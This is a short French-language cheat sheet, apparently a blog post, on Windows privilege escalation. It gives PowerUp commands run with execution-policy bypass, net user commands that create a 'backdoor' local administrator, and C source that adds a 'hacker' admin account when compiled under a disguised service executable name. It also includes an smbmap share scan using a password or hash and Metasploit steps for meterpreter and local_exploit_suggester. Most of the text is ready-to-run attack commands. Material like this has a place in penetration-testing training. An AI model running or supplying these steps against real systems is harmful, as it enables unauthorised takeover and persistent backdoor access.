Escalade de privilèges sous Windows

PowerSploit

Pour trouver des services exploitables ou des DLL ou des clés de registre qui peuvent être exploités

# powershell.exe -nop -exec bypass
# import-module .\powerup.ps1
# Invoke-AllChecks

Autres outils pour trouver des exploits pour élever vos droits et avoir davantage de privilèges:
Windows Exploit Suggester New Generation (wesng)

Ajouter un administrateur local

# net user backdoor motdepasse
# net localgroup Administrators backdoor /add

Code langage C pour ajouter un utilisateur


#i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */  
int main ()  
{  
    int i;
    system("net user hacker Hacker123! /add");
    system("net localgroup administrators hacker /add");  
    return 0;  
}

Scan de partage réseau
# smbmap --host-file smbhosts.txt -u Administrator -p PasswordOrHash

Pour trouver des exploits avec metasploit, il faut d’abord upgrader la session en meterpreter. Pour se faire, nous mettons la session en background avec ctrl+z. Avec “sessions”, nous obtenons l’identifiant associé à la session. Par la suite, sessions -u id.Une nouvelle session sera crée. Par la suite, nous pouvons faire à nouveau un listing des sessions avec “sessions”. Par la suite, nous pouvons utiliser le module local_exploit_suggester et régler le paramètre session avant de faire la recherche d’exploits.

use post/multi/recon/local_exploit_suggester
set session 2
run

Leave a Reply